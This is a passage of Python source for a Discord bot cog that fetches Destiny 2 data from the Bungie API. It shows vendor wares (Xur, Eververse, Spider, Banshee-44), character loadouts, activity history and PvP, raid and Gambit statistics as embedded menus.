(item[\"equippable\"]):\n continue\n perk_hashes = [\n str(p[\"singleInitialItemHash\"]) for p in item[\"sockets\"][\"socketEntries\"]\n ]\n perk_data = await self.get_definition(\n \"DestinyInventoryItemDefinition\", perk_hashes\n )\n perks = \"\"\n item_embed = discord.Embed(title=item[\"displayProperties\"][\"name\"])\n item_embed.set_thumbnail(url=IMAGE_URL + item[\"displayProperties\"][\"icon\"])\n item_embed.set_image(url=IMAGE_URL + item[\"screenshot\"])\n for perk_hash, perk in perk_data.items():\n properties = perk[\"displayProperties\"]\n if \"Common\" in perk[\"itemTypeAndTierDisplayName\"]:\n continue\n if (\n properties[\"name\"] == \"Empty Mod Socket\"\n or properties[\"name\"] == \"Default Ornament\"\n or properties[\"name\"] == \"Change Energy Type\"\n or properties[\"name\"] == \"Empty Catalyst Socket\"\n ):\n continue\n if \"name\" in properties and \"description\" in properties:\n if not properties[\"name\"]:\n continue\n # await self.save(perk, properties[\"name\"] + \".json\")\n if full:\n perks += \"**{0}** - {1}\\n\".format(\n properties[\"name\"], properties[\"description\"]\n )\n else:\n perks += \"- **{0}**\\n\".format(properties[\"name\"])\n stats_str = \"\"\n if \"armor\" in item[\"equippingBlock\"][\"uniqueLabel\"]:\n total = 0\n for stat_hash, stat_data in xur[\"itemComponents\"][\"stats\"][\"data\"][index][\n \"stats\"\n ].items():\n stat_info = (\n await self.get_definition(\"DestinyStatDefinition\", [stat_hash])\n )[str(stat_hash)]\n stat_name = stat_info[\"displayProperties\"][\"name\"]\n stat_value = stat_data[\"value\"]\n prog = \"█\" * int(stat_value / 6)\n empty = \"░\" * int((42 - stat_value) / 6)\n bar = f\"{prog}{empty}\"\n stats_str += f\"{stat_name}: \\n{bar} **{stat_value}**\\n\"\n total += stat_value\n stats_str += _(\"Total: **{total}**\\n\").format(total=total)\n\n msg = (\n item[\"itemTypeAndTierDisplayName\"]\n + \"\\n\"\n + stats_str\n + (item[\"displayProperties\"][\"description\"] + \"\\n\" if full else \"\")\n + perks\n )\n item_embed.description = msg\n embed.insert_field_at(\n 0, name=\"**__\" + item[\"displayProperties\"][\"name\"] + \"__**\\n\", value=msg\n )\n embeds.insert(0, item_embed)\n embeds.insert(0, embed)\n # await ctx.send(embed=embed)\n # await ctx.tick()\n await BaseMenu(\n source=BasePages(\n pages=embeds,\n ),\n delete_message_after=False,\n clear_reactions_after=True,\n timeout=60,\n cog=self,\n page_start=0,\n ).start(ctx=ctx)\n\n @destiny.command()\n @commands.bot_has_permissions(embed_links=True)\n async def eververse(\n self, ctx: commands.Context, *, item_types: Optional[DestinyEververseItemType]\n ) -> None:\n \"\"\"\n Display items currently available on the Eververse in a menu\n\n `[item_types]` can be one of `ghosts`, `ships`, `sparrows`,\n `shaders`, `ornaments` and `finishers` to filter specific items.\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n if not item_types:\n item_types = {\"item_types\": [9, 19, 21, 22, 24, 29], \"item_sub_types\": [21, 20]}\n try:\n chars = await self.get_characters(ctx.author)\n except Destiny2APIError:\n # log.debug(e)\n msg = _(\"I can't seem to find your Destiny profile.\")\n await ctx.send(msg)\n return\n embeds: List[discord.Embed] = []\n eververse_sales = {}\n for char_id, char in chars[\"characters\"][\"data\"].items():\n try:\n ev = await self.get_vendor(ctx.author, char_id, \"3361454721\")\n 
eververse_sales.update(ev[\"sales\"][\"data\"])\n\n except Destiny2APIError:\n log.error(\"I can't seem to see the eververse at the moment\", exc_info=True)\n await ctx.send(_(\"I can't access the eververse at the moment.\"))\n return\n await self.save(eververse_sales, \"eververse.json\")\n embeds = []\n item_hashes = [i[\"itemHash\"] for k, i in eververse_sales.items()]\n item_defs = await self.get_definition(\"DestinyInventoryItemDefinition\", item_hashes)\n item_costs = [c[\"itemHash\"] for k, i in eververse_sales.items() for c in i[\"costs\"]]\n item_cost_defs = await self.get_definition(\n \"DestinyInventoryItemDefinition\", item_costs\n )\n for item_hash, vendor_item in eververse_sales.items():\n item = item_defs[str(vendor_item[\"itemHash\"])]\n if (\n item[\"itemType\"] not in item_types[\"item_types\"]\n and item_types[\"item_types\"] != []\n ):\n # log.debug(\"ignoring item from type %s\" % item[\"itemType\"])\n continue\n if (\n item[\"itemSubType\"] not in item_types[\"item_sub_types\"]\n and item_types[\"item_sub_types\"] != []\n ):\n # log.debug(\"ignoring item from sub type %s\" % item[\"itemSubType\"])\n continue\n embed = discord.Embed()\n embed.description = item[\"displayProperties\"][\"description\"]\n embed.title = item[\"itemTypeAndTierDisplayName\"]\n name = item[\"displayProperties\"][\"name\"]\n icon_url = IMAGE_URL + item[\"displayProperties\"][\"icon\"]\n embed.set_author(name=name, icon_url=icon_url)\n embed.set_thumbnail(url=icon_url)\n cost_str = \"\"\n for costs in vendor_item[\"costs\"]:\n cost = costs[\"quantity\"]\n cost_name = item_cost_defs[str(costs[\"itemHash\"])][\"displayProperties\"][\"name\"]\n cost_str += f\"{cost_name}: **{cost}**\\n\"\n embed.add_field(name=_(\"Cost\"), value=cost_str)\n if \"screenshot\" in item:\n embed.set_image(url=IMAGE_URL + item[\"screenshot\"])\n embeds.append(embed)\n if embeds == []:\n return await ctx.send(_(\"I can't access the eververse at the moment.\"))\n # await ctx.tick()\n await BaseMenu(\n source=BasePages(\n pages=embeds,\n ),\n delete_message_after=False,\n clear_reactions_after=True,\n timeout=60,\n cog=self,\n page_start=0,\n ).start(ctx=ctx)\n\n @destiny.command()\n @commands.bot_has_permissions(embed_links=True)\n async def spider(self, ctx: commands.Context) -> None:\n \"\"\"\n Display Spiders wares\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n try:\n chars = await self.get_characters(ctx.author)\n except Destiny2APIError:\n # log.debug(e)\n msg = _(\"I can't seem to find your Destiny profile.\")\n await ctx.send(msg)\n return\n for char_id, char in chars[\"characters\"][\"data\"].items():\n try:\n spider = await self.get_vendor(ctx.author, char_id, \"863940356\")\n spider_def = (\n await self.get_definition(\"DestinyVendorDefinition\", [\"863940356\"])\n )[\"863940356\"]\n except Destiny2APIError:\n log.error(\"I can't seem to see the Spider at the moment\", exc_info=True)\n await ctx.send(_(\"I can't access the Spider at the moment.\"))\n return\n break\n\n # await self.save(spider, \"spider.json\")\n currency_datas = await self.get_definition(\n \"DestinyInventoryItemLiteDefinition\",\n [v[\"itemHash\"] for v in chars[\"profileCurrencies\"][\"data\"][\"items\"]],\n )\n embed = discord.Embed(description=spider_def[\"displayProperties\"][\"description\"])\n embed.set_thumbnail(\n url=IMAGE_URL + 
spider_def[\"displayProperties\"][\"largeTransparentIcon\"]\n )\n embed.set_author(\n name=spider_def[\"displayProperties\"][\"name\"]\n + \", \"\n + spider_def[\"displayProperties\"][\"subtitle\"]\n )\n item_hashes = [i[\"itemHash\"] for k, i in spider[\"sales\"][\"data\"].items()]\n item_defs = await self.get_definition(\n \"DestinyInventoryItemLiteDefinition\", item_hashes\n )\n item_costs = [\n c[\"itemHash\"] for k, i in spider[\"sales\"][\"data\"].items() for c in i[\"costs\"]\n ]\n item_cost_defs = await self.get_definition(\n \"DestinyInventoryItemLiteDefinition\", item_costs\n )\n for key, data in spider[\"sales\"][\"data\"].items():\n item_hash = data[\"itemHash\"]\n\n item = item_defs[str(item_hash)]\n if item[\"itemType\"] in [0, 26]:\n continue\n try:\n costs = data[\"costs\"][0]\n cost = item_cost_defs[str(costs[\"itemHash\"])]\n cost_str = str(costs[\"quantity\"]) + \" \" + cost[\"displayProperties\"][\"name\"]\n except IndexError:\n cost_str = \"None\"\n embed.add_field(name=item[\"displayProperties\"][\"name\"], value=cost_str)\n\n await asyncio.sleep(0)\n player_currency = \"\"\n for item in chars[\"profileCurrencies\"][\"data\"][\"items\"]:\n quantity = item[\"quantity\"]\n name = currency_datas[str(item[\"itemHash\"])][\"displayProperties\"][\"name\"]\n player_currency += f\"{name}: **{quantity}**\\n\"\n embed.add_field(name=_(\"Current Currencies\"), value=player_currency)\n await ctx.send(embed=embed)\n\n @destiny.command(aliases=[\"banshee-44\"])\n @commands.bot_has_permissions(embed_links=True)\n async def banshee(self, ctx: commands.Context) -> None:\n \"\"\"\n Display Banshee-44's wares\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n try:\n chars = await self.get_characters(ctx.author)\n except Destiny2APIError:\n # log.debug(e)\n msg = _(\"I can't seem to find your Destiny profile.\")\n await ctx.send(msg)\n return\n\n for char_id, char in chars[\"characters\"][\"data\"].items():\n try:\n banshee = await self.get_vendor(ctx.author, char_id, \"672118013\")\n banshee_def = (\n await self.get_definition(\"DestinyVendorDefinition\", [\"672118013\"])\n )[\"672118013\"]\n await self.save(banshee, \"banshee.json\")\n except Destiny2APIError:\n log.error(\n \"I can't seem to see the Banshee-44's wares at the moment\", exc_info=True\n )\n await ctx.send(_(\"I can't access the Banshee-44 at the moment.\"))\n return\n break\n # await self.save(spider, \"spider.json\")\n embed = discord.Embed(description=banshee_def[\"displayProperties\"][\"description\"])\n embed.set_thumbnail(\n url=IMAGE_URL + banshee_def[\"displayProperties\"][\"largeTransparentIcon\"]\n )\n embed.set_author(\n name=banshee_def[\"displayProperties\"][\"name\"]\n + \", \"\n + banshee_def[\"displayProperties\"][\"subtitle\"]\n )\n item_hashes = [i[\"itemHash\"] for k, i in banshee[\"sales\"][\"data\"].items()]\n item_defs = await self.get_definition(\n \"DestinyInventoryItemLiteDefinition\", item_hashes\n )\n item_costs = [\n c[\"itemHash\"] for k, i in banshee[\"sales\"][\"data\"].items() for c in i[\"costs\"]\n ]\n item_cost_defs = await self.get_definition(\n \"DestinyInventoryItemLiteDefinition\", item_costs\n )\n for key, data in banshee[\"sales\"][\"data\"].items():\n item_hash = data[\"itemHash\"]\n\n item = item_defs[str(item_hash)]\n if item[\"itemType\"] in [0]:\n continue\n try:\n costs = data[\"costs\"][0]\n cost = 
item_cost_defs[str(costs[\"itemHash\"])]\n cost_str = str(costs[\"quantity\"]) + \" \" + cost[\"displayProperties\"][\"name\"]\n except IndexError:\n cost_str = \"None\"\n\n embed.add_field(name=item[\"displayProperties\"][\"name\"], value=cost_str)\n\n await asyncio.sleep(0)\n await ctx.send(embed=embed)\n\n @destiny.command()\n @commands.bot_has_permissions(embed_links=True, add_reactions=True)\n async def loadout(\n self, ctx: commands.Context, full: Optional[bool] = False, user: discord.Member = None\n ) -> None:\n \"\"\"\n Display a menu of each character's equipped weapons and their info\n\n `[full=False]` Display full information about weapons equipped.\n `[user]` A member on the server who has setup their account on this bot.\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx, user):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n if not user:\n user = ctx.author\n try:\n chars = await self.get_characters(user)\n except Destiny2APIError:\n # log.debug(e)\n msg = _(\"I can't seem to find your Destiny profile.\")\n await ctx.send(msg)\n return\n embeds = []\n\n for char_id, char in chars[\"characters\"][\"data\"].items():\n info = \"\"\n race = (await self.get_definition(\"DestinyRaceDefinition\", [char[\"raceHash\"]]))[\n str(char[\"raceHash\"])\n ]\n gender = (\n await self.get_definition(\"DestinyGenderDefinition\", [char[\"genderHash\"]])\n )[str(char[\"genderHash\"])]\n char_class = (\n await self.get_definition(\"DestinyClassDefinition\", [char[\"classHash\"]])\n )[str(char[\"classHash\"])]\n info += \"{race} {gender} {char_class} \".format(\n race=race[\"displayProperties\"][\"name\"],\n gender=gender[\"displayProperties\"][\"name\"],\n char_class=char_class[\"displayProperties\"][\"name\"],\n )\n titles = \"\"\n if \"titleRecordHash\" in char:\n # TODO: Add fetch for Destiny.Definitions.Records.DestinyRecordDefinition\n char_title = (\n await self.get_definition(\n \"DestinyRecordDefinition\", [char[\"titleRecordHash\"]]\n )\n )[str(char[\"titleRecordHash\"])]\n title_info = \"**{title_name}**\\n{title_desc}\\n\"\n try:\n gilded = \"\"\n if await self.check_gilded_title(chars, char_title):\n gilded = _(\"Gilded \")\n title_name = (\n f\"{gilded}\"\n + char_title[\"titleInfo\"][\"titlesByGenderHash\"][\n str(char[\"genderHash\"])\n ]\n )\n title_desc = char_title[\"displayProperties\"][\"description\"]\n titles += title_info.format(title_name=title_name, title_desc=title_desc)\n except KeyError:\n pass\n embed = discord.Embed(title=info)\n embed.set_author(name=user.display_name, icon_url=user.avatar_url)\n if \"emblemPath\" in char:\n embed.set_thumbnail(url=IMAGE_URL + char[\"emblemPath\"])\n if titles:\n # embed.add_field(name=_(\"Titles\"), value=titles)\n embed.set_author(\n name=f\"{user.display_name} ({title_name})\", icon_url=user.avatar_url\n )\n char_items = chars[\"characterEquipment\"][\"data\"][char_id][\"items\"]\n item_list = [i[\"itemHash\"] for i in char_items]\n # log.debug(item_list)\n items = await self.get_definition(\"DestinyInventoryItemDefinition\", item_list)\n # log.debug(items)\n for item_hash, data in items.items():\n # log.debug(data)\n for item in char_items:\n # log.debug(item)\n if data[\"hash\"] == item[\"itemHash\"]:\n instance_id = item[\"itemInstanceId\"]\n item_instance = chars[\"itemComponents\"][\"instances\"][\"data\"][instance_id]\n if not item_instance[\"isEquipped\"]:\n continue\n\n if not (data[\"equippable\"] and data[\"itemType\"] 
== 3):\n continue\n name = data[\"displayProperties\"][\"name\"]\n desc = data[\"displayProperties\"][\"description\"]\n item_type = data[\"itemTypeAndTierDisplayName\"]\n try:\n light = item_instance[\"primaryStat\"][\"value\"]\n except KeyError:\n light = \"\"\n perk_list = chars[\"itemComponents\"][\"perks\"][\"data\"][instance_id][\"perks\"]\n perk_hashes = [p[\"perkHash\"] for p in perk_list]\n perk_data = await self.get_definition(\n \"DestinySandboxPerkDefinition\", perk_hashes\n )\n perks = \"\"\n for perk_hash, perk in perk_data.items():\n properties = perk[\"displayProperties\"]\n if \"name\" in properties and \"description\" in properties:\n if full:\n perks += \"**{0}** - {1}\\n\".format(\n properties[\"name\"], properties[\"description\"]\n )\n else:\n perks += \"- **{0}**\\n\".format(properties[\"name\"])\n\n value = f\"**{light}** {item_type}\\n{perks}\"\n embed.add_field(name=name, value=value, inline=True)\n # log.debug(data)\n stats_str = \"\"\n for stat_hash, value in char[\"stats\"].items():\n stat_info = (await self.get_definition(\"DestinyStatDefinition\", [stat_hash]))[\n str(stat_hash)\n ]\n stat_name = stat_info[\"displayProperties\"][\"name\"]\n prog = \"█\" * int(value / 10)\n empty = \"░\" * int((100 - value) / 10)\n bar = f\"{prog}{empty}\"\n if stat_hash == \"1935470627\":\n bar = \"\"\n stats_str += f\"{stat_name}: **{value}** \\n{bar}\\n\"\n embed.description = stats_str\n embed = await self.get_char_colour(embed, char)\n\n embeds.append(embed)\n await BaseMenu(\n source=BasePages(\n pages=embeds,\n ),\n delete_message_after=False,\n clear_reactions_after=True,\n timeout=60,\n cog=self,\n page_start=0,\n ).start(ctx=ctx)\n\n @destiny.command()\n @commands.bot_has_permissions(embed_links=True, add_reactions=True)\n async def gambit(self, ctx: commands.Context) -> None:\n \"\"\"\n Display a menu of each characters gambit stats\n \"\"\"\n await ctx.invoke(self.stats, \"allPvECompetitive\")\n\n @destiny.command()\n @commands.bot_has_permissions(embed_links=True, add_reactions=True)\n async def pvp(self, ctx: commands.Context) -> None:\n \"\"\"\n Display a menu of each character's pvp stats\n \"\"\"\n await ctx.invoke(self.stats, \"allPvP\")\n\n @destiny.command(aliases=[\"raids\"])\n @commands.bot_has_permissions(embed_links=True, add_reactions=True)\n async def raid(self, ctx: commands.Context) -> None:\n \"\"\"\n Display a menu for each character's RAID stats\n \"\"\"\n await ctx.invoke(self.stats, \"raid\")\n\n @destiny.command(aliases=[\"qp\"])\n @commands.bot_has_permissions(embed_links=True, add_reactions=True)\n async def quickplay(self, ctx: commands.Context) -> None:\n \"\"\"\n Display a menu of past quickplay matches\n \"\"\"\n await ctx.invoke(self.history, 70)\n\n @destiny.command()\n @commands.bot_has_permissions(embed_links=True, add_reactions=True)\n async def history(self, ctx: commands.Context, activity: DestinyActivity) -> None:\n \"\"\"\n Display a menu of each character's last 5 activities\n\n `` The activity type to display stats on available types include:\n all, story, strike, raid, allpvp, patrol, allpve, control, clash,\n crimsondoubles, nightfall, heroicnightfall, allstrikes, ironbanner, allmayhem,\n supremacy, privatematchesall, survival, countdown, trialsofthenine, social,\n trialscountdown, trialssurvival, ironbannercontrol, ironbannerclash,\n ironbannersupremacy, scorednightfall, scoredheroicnightfall, rumble, alldoubles,\n doubles, privatematchesclash, privatematchescontrol, privatematchessupremacy,\n privatematchescountdown, 
privatematchessurvival, privatematchesmayhem,\n privatematchesrumble, heroicadventure, showdown, lockdown, scorched,\n scorchedteam, gambit, allpvecompetitive, breakthrough, blackarmoryrun,\n salvage, ironbannersalvage, pvpcompetitive, pvpquickplay, clashquickplay,\n clashcompetitive, controlquickplay, controlcompetitive, gambitprime,\n reckoning, menagerie, vexoffensive, nightmarehunt, elimination, momentum,\n dungeon, sundial, trialsofosiris\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n user = ctx.author\n try:\n chars = await self.get_characters(user)\n except Destiny2APIError:\n # log.debug(e)\n msg = _(\"I can't seem to find your Destiny profile.\")\n await ctx.send(msg)\n return\n RAID = {\n \"assists\": _(\"Assists\"),\n \"kills\": _(\"Kills\"),\n \"deaths\": _(\"Deaths\"),\n \"opponentsDefeated\": _(\"Opponents Defeated\"),\n \"efficiency\": _(\"Efficiency\"),\n \"killsDeathsRatio\": _(\"KDR\"),\n \"killsDeathsAssists\": _(\"KDA\"),\n \"score\": _(\"Score\"),\n \"activityDurationSeconds\": _(\"Duration\"),\n \"playerCount\": _(\"Player Count\"),\n \"teamScore\": _(\"Team Score\"),\n \"completed\": _(\"Completed\"),\n }\n embeds = []\n for char_id, char in chars[\"characters\"][\"data\"].items():\n # log.debug(char)\n char_info = \"\"\n race = (await self.get_definition(\"DestinyRaceDefinition\", [char[\"raceHash\"]]))[\n str(char[\"raceHash\"])\n ]\n gender = (\n await self.get_definition(\"DestinyGenderDefinition\", [char[\"genderHash\"]])\n )[str(char[\"genderHash\"])]\n log.debug(gender)\n char_class = (\n await self.get_definition(\"DestinyClassDefinition\", [char[\"classHash\"]])\n )[str(char[\"classHash\"])]\n char_info += \"{user} - {race} {gender} {char_class} \".format(\n user=user.display_name,\n race=race[\"displayProperties\"][\"name\"],\n gender=gender[\"displayProperties\"][\"name\"],\n char_class=char_class[\"displayProperties\"][\"name\"],\n )\n try:\n data = await self.get_activity_history(user, char_id, activity)\n except Exception:\n log.error(\n _(\n \"Something went wrong I couldn't get info on character {char_id} for activity {activity}\"\n ).format(char_id=char_id, activity=activity)\n )\n continue\n if not data:\n continue\n\n for activities in data[\"activities\"]:\n activity_hash = str(activities[\"activityDetails\"][\"directorActivityHash\"])\n activity_data = (\n await self.get_definition(\"DestinyActivityDefinition\", [activity_hash])\n )[str(activity_hash)]\n embed = discord.Embed(\n title=activity_data[\"displayProperties\"][\"name\"],\n description=activity_data[\"displayProperties\"][\"description\"],\n )\n\n date = datetime.datetime.strptime(activities[\"period\"], \"%Y-%m-%dT%H:%M:%SZ\")\n embed.timestamp = date\n if activity_data[\"displayProperties\"][\"hasIcon\"]:\n embed.set_thumbnail(\n url=IMAGE_URL + activity_data[\"displayProperties\"][\"icon\"]\n )\n elif (\n activity_data[\"pgcrImage\"] != \"/img/misc/missing_icon_d2.png\"\n and \"emblemPath\" in char\n ):\n embed.set_thumbnail(url=IMAGE_URL + char[\"emblemPath\"])\n embed.set_author(name=char_info, icon_url=user.avatar_url)\n for attr, name in RAID.items():\n if activities[\"values\"][attr][\"basic\"][\"value\"] < 0:\n continue\n embed.add_field(\n name=name,\n value=str(activities[\"values\"][attr][\"basic\"][\"displayValue\"]),\n )\n embed = await self.get_char_colour(embed, char)\n\n embeds.append(embed)\n await BaseMenu(\n 
source=BasePages(\n pages=embeds,\n ),\n delete_message_after=False,\n clear_reactions_after=True,\n timeout=60,\n cog=self,\n page_start=0,\n ).start(ctx=ctx)\n\n @staticmethod\n async def get_extra_attrs(stat_type: str, attrs: dict) -> dict:\n \"\"\"Helper function to receive the total attributes we care about\"\"\"\n EXTRA_ATTRS = {}\n if stat_type == \"allPvECompetitive\":\n EXTRA_ATTRS = {\n \"winLossRatio\": _(\"Win Loss Ratio\"),\n \"invasions\": _(\"Invasions\"),\n \"invasionKills\": _(\"Invasion Kills\"),\n \"invasionDeaths\": _(\"Invasion Deaths\"),\n \"invaderDeaths\": _(\"Invader Deaths\"),\n \"invaderKills\": _(\"Invader Kills\"),\n \"primevalKills\": _(\"Primeval Kills\"),\n \"blockerKills\": _(\"Blocker Kills\"),\n \"mobKills\": _(\"Mob Kills\"),\n \"highValueKills\": _(\"High Value Targets Killed\"),\n \"motesPickedUp\": _(\"Motes Picked Up\"),\n \"motesDeposited\": _(\"Motes Deposited\"),\n \"motesDenied\": _(\"Motes Denied\"),\n \"motesLost\": _(\"Motes Lost\"),\n }\n if stat_type == \"allPvP\":\n EXTRA_ATTRS = {\"winLossRatio\": _(\"Win Loss Ratio\")}\n for k, v in EXTRA_ATTRS.items():\n attrs[k] = v\n return attrs\n\n async def build_character_stats(\n self, user: discord.Member, chars: dict, stat_type: str\n ) -> List[discord.Embed]:\n\n embeds: List[discord.Embed] = []\n for char_id, char in chars[\"characters\"][\"data\"].items():\n # log.debug(char)\n\n try:\n data = await self.get_historical_stats(user, char_id, 0)\n except Exception:\n log.error(\n _(\"Something went wrong I couldn't get info on character {char_id}\").format(\n char_id=char_id\n )\n )\n continue\n if not data:\n continue\n try:\n if stat_type != \"allPvECompetitive\":\n embed = await self.build_stat_embed_char_basic(user, char, data, stat_type)\n embeds.append(embed)\n else:\n data = data[stat_type][\"allTime\"]\n embed = await self.build_stat_embed_char_gambit(user, char, data, stat_type)\n embeds.append(embed)\n except Exception:\n log.error(\n f\"User {user.id} had an issue generating stats for character {char_id}\",\n exc_info=True,\n )\n continue\n return embeds\n\n async def build_stat_embed_char_basic(\n self, user: discord.Member, char: dict, data: dict, stat_type: str\n ) -> discord.Embed:\n char_info = \"\"\n race = (await self.get_definition(\"DestinyRaceDefinition\", [char[\"raceHash\"]]))[\n str(char[\"raceHash\"])\n ]\n gender = (await self.get_definition(\"DestinyGenderDefinition\", [char[\"genderHash\"]]))[\n str(char[\"genderHash\"])\n ]\n char_class = (await self.get_definition(\"DestinyClassDefinition\", [char[\"classHash\"]]))[\n str(char[\"classHash\"])\n ]\n char_info += \"{user} - {race} {gender} {char_class} \".format(\n user=user.display_name,\n race=race[\"displayProperties\"][\"name\"],\n gender=gender[\"displayProperties\"][\"name\"],\n char_class=char_class[\"displayProperties\"][\"name\"],\n )\n ATTRS = {\n \"opponentsDefeated\": _(\"Opponents Defeated\"),\n \"efficiency\": _(\"Efficiency\"),\n \"bestSingleGameKills\": _(\"Best Single Game Kills\"),\n \"bestSingleGameScore\": _(\"Best Single Game Score\"),\n \"precisionKills\": _(\"Precision Kills\"),\n \"longestKillSpree\": _(\"Longest Killing Spree\"),\n \"longestSingleLife\": _(\"Longest Single Life\"),\n \"totalActivityDurationSeconds\": _(\"Total time playing\"),\n \"averageLifespan\": _(\"Average Life Span\"),\n \"weaponBestType\": _(\"Best Weapon Type\"),\n }\n embed = discord.Embed(title=stat_type.title())\n embed.set_author(name=char_info, icon_url=user.avatar_url)\n kills = 
data[stat_type][\"allTime\"][\"kills\"][\"basic\"][\"displayValue\"]\n deaths = data[stat_type][\"allTime\"][\"deaths\"][\"basic\"][\"displayValue\"]\n assists = data[stat_type][\"allTime\"][\"assists\"][\"basic\"][\"displayValue\"]\n kda = f\"{kills} | {deaths} | {assists}\"\n embed.add_field(name=_(\"Kills | Deaths | Assists\"), value=kda)\n if \"emblemPath\" in char:\n embed.set_thumbnail(url=IMAGE_URL + char[\"emblemPath\"])\n for stat, values in data[stat_type][\"allTime\"].items():\n\n if values[\"basic\"][\"value\"] < 0 or stat not in ATTRS:\n continue\n embed.add_field(name=ATTRS[stat], value=str(values[\"basic\"][\"displayValue\"]))\n if \"killsDeathsRatio\" in data[stat_type] and \"killsDeathsAssists\" in data[stat_type]:\n kdr = data[stat_type][\"killsDeathsRatio\"]\n kda = data[stat_type][\"killsDeathsAssists\"]\n if kdr or kda:\n embed.add_field(name=_(\"KDR/KDA\"), value=f\"{kdr}/{kda}\")\n if (\n \"resurrectionsPerformed\" in data[stat_type]\n and \"resurrectionsReceived\" in data[stat_type]\n ):\n res = data[stat_type][\"resurrectionsPerformed\"]\n resur = data[stat_type][\"resurrectionsReceived\"]\n if res or resur:\n embed.add_field(name=_(\"Resurrections/Received\"), value=f\"{res}/{resur}\")\n return await self.get_char_colour(embed, char)\n\n async def build_stat_embed_char_gambit(\n self, user: discord.Member, char: dict, data: dict, stat_type: str\n ) -> discord.Embed:\n char_info = \"\"\n race = (await self.get_definition(\"DestinyRaceDefinition\", [char[\"raceHash\"]]))[\n str(char[\"raceHash\"])\n ]\n gender = (await self.get_definition(\"DestinyGenderDefinition\", [char[\"genderHash\"]]))[\n str(char[\"genderHash\"])\n ]\n char_class = (await self.get_definition(\"DestinyClassDefinition\", [char[\"classHash\"]]))[\n str(char[\"classHash\"])\n ]\n char_info += \"{user} - {race} {gender} {char_class} \".format(\n user=user.display_name,\n race=race[\"displayProperties\"][\"name\"],\n gender=gender[\"displayProperties\"][\"name\"],\n char_class=char_class[\"displayProperties\"][\"name\"],\n )\n ATTRS = {\n \"opponentsDefeated\": _(\"Opponents Defeated\"),\n \"efficiency\": _(\"Efficiency\"),\n \"bestSingleGameKills\": _(\"Best Single Game Kills\"),\n \"bestSingleGameScore\": _(\"Best Single Game Score\"),\n \"precisionKills\": _(\"Precision Kills\"),\n \"longestKillSpree\": _(\"Longest Killing Spree\"),\n \"longestSingleLife\": _(\"Longest Single Life\"),\n \"totalActivityDurationSeconds\": _(\"Total time playing\"),\n \"averageLifespan\": _(\"Average Life Span\"),\n \"weaponBestType\": _(\"Best Weapon Type\"),\n \"winLossRatio\": _(\"Win Loss Ratio\"),\n }\n embed = discord.Embed(title=\"Gambit\")\n embed.set_author(name=char_info, icon_url=user.avatar_url)\n kills = data[\"kills\"][\"basic\"][\"displayValue\"]\n deaths = data[\"deaths\"][\"basic\"][\"displayValue\"]\n assists = data[\"assists\"][\"basic\"][\"displayValue\"]\n kda = f\"{kills} | {deaths} | {assists}\"\n embed.add_field(name=_(\"Kills | Deaths | Assists\"), value=kda)\n small_blocker = data[\"smallBlockersSent\"][\"basic\"][\"displayValue\"]\n med_blocker = data[\"mediumBlockersSent\"][\"basic\"][\"displayValue\"]\n large_blocker = data[\"largeBlockersSent\"][\"basic\"][\"displayValue\"]\n blockers = f\"S {small_blocker}, M {med_blocker}, L {large_blocker}\"\n embed.add_field(name=_(\"Blockers\"), value=blockers)\n invasions = _(\"Invasions: {invasions}\").format(\n invasions=data[\"invasions\"][\"basic\"][\"displayValue\"]\n )\n invasion_kills = _(\"Kills: {kills}\\nDeaths: {deaths}\").format(\n 
kills=data[\"invasionKills\"][\"basic\"][\"displayValue\"],\n deaths=data[\"invasionDeaths\"][\"basic\"][\"displayValue\"],\n )\n embed.add_field(name=invasions, value=invasion_kills)\n invaders = _(\"Killed: {killed}\\nKilled By: {by}\").format(\n killed=data[\"invaderKills\"][\"basic\"][\"displayValue\"],\n by=data[\"invaderDeaths\"][\"basic\"][\"displayValue\"],\n )\n embed.add_field(name=_(\"Invaders\"), value=invaders)\n motes_dep = data[\"motesDeposited\"][\"basic\"][\"value\"]\n try:\n lost = 1 - (motes_dep / data[\"motesPickedUp\"][\"basic\"][\"value\"])\n motes_lost = \"{:.2%}\".format(lost)\n except ZeroDivisionError:\n motes_lost = \"0%\"\n motes = _(\"{motes:,} ({lost} Lost)\").format(motes=motes_dep, lost=motes_lost)\n embed.add_field(name=_(\"Motes Deposited\"), value=motes)\n motes_denied = data[\"motesDenied\"][\"basic\"][\"value\"]\n embed.add_field(name=_(\"Motes Denied\"), value=\"{:,}\".format(motes_denied))\n mob_kills = data[\"mobKills\"][\"basic\"][\"value\"]\n primeval_kills = data[\"primevalKills\"][\"basic\"][\"value\"]\n high_kills = data[\"highValueKills\"][\"basic\"][\"value\"]\n kills_msg = _(\"Primevals: {prime:,}\\nHigh Value Targets: {high:,}\\nMobs: {mobs:,}\").format(\n prime=primeval_kills, high=high_kills, mobs=mob_kills\n )\n embed.add_field(name=_(\"Kill Stats\"), value=kills_msg)\n if \"killsDeathsRatio\" in data and \"killsDeathsAssists\" in data:\n kdr = data[\"killsDeathsRatio\"][\"basic\"][\"displayValue\"]\n kda = data[\"killsDeathsAssists\"][\"basic\"][\"displayValue\"]\n if kdr or kda:\n embed.add_field(name=_(\"KDR/KDA\"), value=f\"{kdr}/{kda}\")\n if \"resurrectionsPerformed\" in data and \"resurrectionsReceived\" in data:\n res = data[\"resurrectionsPerformed\"][\"basic\"][\"displayValue\"]\n resur = data[\"resurrectionsReceived\"][\"basic\"][\"displayValue\"]\n if res or resur:\n embed.add_field(name=_(\"Resurrections/Received\"), value=f\"{res}/{resur}\")\n if \"emblemPath\" in char:\n embed.set_thumbnail(url=IMAGE_URL + char[\"emblemPath\"])\n for stat, values in data.items():\n\n if values[\"basic\"][\"value\"] < 0 or stat not in ATTRS:\n continue\n embed.add_field(name=ATTRS[stat], value=str(values[\"basic\"][\"displayValue\"]))\n\n return await self.get_char_colour(embed, char)\n\n @destiny.command()\n 